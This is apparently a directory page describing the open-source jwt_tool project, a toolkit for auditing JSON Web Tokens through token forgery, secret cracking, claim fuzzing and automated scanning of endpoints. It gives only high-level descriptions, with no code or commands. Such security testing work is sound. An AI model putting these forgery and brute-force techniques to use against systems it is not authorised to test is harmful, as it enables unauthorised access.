# ticarpi/jwt_tool **Attribution required: if you use, quote, or summarise this content, you must credit and link back to [awesome-repositories.com](https://awesome-repositories.com/repository/ticarpi-jwt-tool).** 6,668 stars · 800 forks · Python · GPL-3.0 ## Links - GitHub: https://github.com/ticarpi/jwt_tool - awesome-repositories: https://awesome-repositories.com/repository/ticarpi-jwt-tool.md ## Description jwt_tool is a security testing toolkit designed for analyzing, tampering with, and auditing JSON Web Tokens to identify cryptographic vulnerabilities and implementation flaws. It serves as a comprehensive suite for security auditing and vulnerability scanning, providing a debugging interface to inspect token headers and payloads. The project distinguishes itself through specialized capabilities for token forgery and secret cracking. It includes a token generator that signs custom tokens using RSA, ECDSA, and symmetric algorithms, and a brute force tool that uses high-speed dictionary attacks to uncover weak secret keys. It also features an automated vulnerability scanner that executes predefined playbooks against web endpoints to detect common misconfigurations. The toolkit covers a broad range of security testing activities, including identity provider analysis via web key set discovery, token claim fuzzing, and integrity validation. It supports the transmission of modified tokens through HTTP headers and cookies to monitor server responses for successful exploitation. The application supports containerized deployment to ensure consistent execution across different computing environments. ## Tags ### Security & Cryptography - [JWT Vulnerability Analysis](https://awesome-repositories.com/f/security-cryptography/access-tokens/jwt-vulnerability-analysis.md) — Provides a comprehensive suite for identifying vulnerabilities and misconfigurations in JSON Web Token implementations. - [Token Forgery Exploits](https://awesome-repositories.com/f/security-cryptography/elliptic-curve-cryptography/signature-forgery-exploitations/token-forgery-exploits.md) — Creates tokens using known vulnerabilities to bypass signature validation and gain unauthorized access. ([source](https://github.com/ticarpi/jwt_tool/wiki/Using-jwt_tool)) - [JWT Secret Cracking](https://awesome-repositories.com/f/security-cryptography/jwt-secret-cracking.md) — Uses dictionary attacks and brute force to uncover weak secret keys used for signing JSON Web Tokens. - [JWT Vulnerability Scanning](https://awesome-repositories.com/f/security-cryptography/jwt-vulnerability-scanning.md) — Runs predefined tests and playbooks against target URLs to identify common token misconfigurations. ([source](https://github.com/ticarpi/jwt_tool/wiki/Using-jwt_tool)) - [Secret Key Brute-forcing](https://awesome-repositories.com/f/security-cryptography/secret-key-brute-forcing.md) — Provides high-speed dictionary attacks to uncover weak secret keys used for signing JSON Web Tokens. - [Web Vulnerability Scanners](https://awesome-repositories.com/f/security-cryptography/security-scanners/web-vulnerability-scanners.md) — Automates the testing of web endpoints for common JSON Web Token implementation flaws and signature bypasses. - [Multi-Algorithm Signings](https://awesome-repositories.com/f/security-cryptography/signature-verification-tools/outgoing-request-signing/hmac-sha256-data-signers/api-request-signing/multi-algorithm-signings.md) — Implements a common interface for signing tokens using HMAC, RSA, and ECDSA cryptographic standards. - [JWT Signing and Verification](https://awesome-repositories.com/f/security-cryptography/token-authentication/token-signature-verification/jwt-signing-and-verification.md) — Creates and signs custom JSON Web Tokens using RSA, ECDSA, and various symmetric algorithms. - [Token Forgery](https://awesome-repositories.com/f/security-cryptography/token-authentication/token-signature-verification/jwt-signing-and-verification/token-forgery.md) — Creates and signs modified JSON Web Tokens to bypass security controls and gain unauthorized access. - [Canary-Based Response Validation](https://awesome-repositories.com/f/security-cryptography/application-and-system-security/web-security/http-header-analyzers/http-response-header-inspectors/canary-based-response-validation.md) — Sends modified tokens via headers or cookies and validates server responses using unique canary values. - [Cryptographic Key Generation](https://awesome-repositories.com/f/security-cryptography/cryptographic-key-management/cryptographic-key-generation.md) — Enables the creation of RSA and ECDSA keys for signing and forging tokens. ([source](https://github.com/ticarpi/jwt_tool#readme)) - [Provider Security Analysis](https://awesome-repositories.com/f/security-cryptography/identity-providers/provider-security-analysis.md) — Discovers and inspects web key sets and endpoints to analyze identity provider token verification. - [Key Reconstruction](https://awesome-repositories.com/f/security-cryptography/json-web-key-imports/key-reconstruction.md) — Parses JSON Web Key Set files to extract and rebuild cryptographic keys for token forging. - [Token Claim Fuzzing](https://awesome-repositories.com/f/security-cryptography/jwt-claim-validation/claim-injection/token-claim-fuzzing.md) — Injects custom values into headers and claims to identify injection vulnerabilities or force application errors. ([source](https://github.com/ticarpi/jwt_tool#readme)) - [Token Processing Misconfigurations](https://awesome-repositories.com/f/security-cryptography/misconfiguration-scanning/token-processing-misconfigurations.md) — Runs automated playbooks against live applications to identify security flaws in token processing. ([source](https://github.com/ticarpi/jwt_tool#readme)) - [Provider Endpoint Discovery Mechanisms](https://awesome-repositories.com/f/security-cryptography/openid-connect-support/provider-endpoint-discovery-mechanisms.md) — Scans common URL paths to discover web key sets used for token verification in identity providers. ([source](https://github.com/ticarpi/jwt_tool/blob/master/jwks-common.txt)) - [Token Validation](https://awesome-repositories.com/f/security-cryptography/security/policies/token-validation.md) — Checks token validity and tests for signature bypasses, key injection, and public key mismatches. ([source](https://github.com/ticarpi/jwt_tool#readme)) - [Token Signing Operations](https://awesome-repositories.com/f/security-cryptography/token-authentication/token-signature-verification/token-signing-operations.md) — Generates valid token signatures using provided secrets or private keys across multiple algorithms. ([source](https://github.com/ticarpi/jwt_tool/wiki/Using-jwt_tool)) - [Token Content Tampering](https://awesome-repositories.com/f/security-cryptography/token-authentication/token-signature-verification/token-signing-operations/token-content-tampering.md) — Creates new tokens by tampering with headers, payloads, or timestamps and signing them with a provided key. ([source](https://github.com/ticarpi/jwt_tool#readme)) - [Token Transmission Testing](https://awesome-repositories.com/f/security-cryptography/token-validation-services/token-transmission-testing.md) — Sends modified tokens to web services via headers or cookies and verifies results using canary values. ([source](https://github.com/ticarpi/jwt_tool/blob/master/README.md)) ### Part of an Awesome List - [Brute Force Tools](https://awesome-repositories.com/f/awesome-lists/security/brute-force-tools.md) — Provides a utility for cracking JSON Web Token secret keys using high-speed dictionary attacks. - [Token Debugging Interfaces](https://awesome-repositories.com/f/awesome-lists/devtools/jwt-and-token-management/token-debugging-interfaces.md) — Provides a workspace for inspecting token headers and payloads while testing against live application targets. ### Testing & Quality Assurance - [Test-Case-Driven Vulnerability Validation](https://awesome-repositories.com/f/testing-quality-assurance/test-case-driven-vulnerability-validation.md) — Executes a sequence of predefined test cases against target URLs to detect known token misconfigurations. - [Token Exploitation Testing](https://awesome-repositories.com/f/testing-quality-assurance/token-exploitation-testing.md) — Allows sending modified tokens to a target URL via HTTP requests to monitor responses for successful exploitation. ([source](https://github.com/ticarpi/jwt_tool#readme))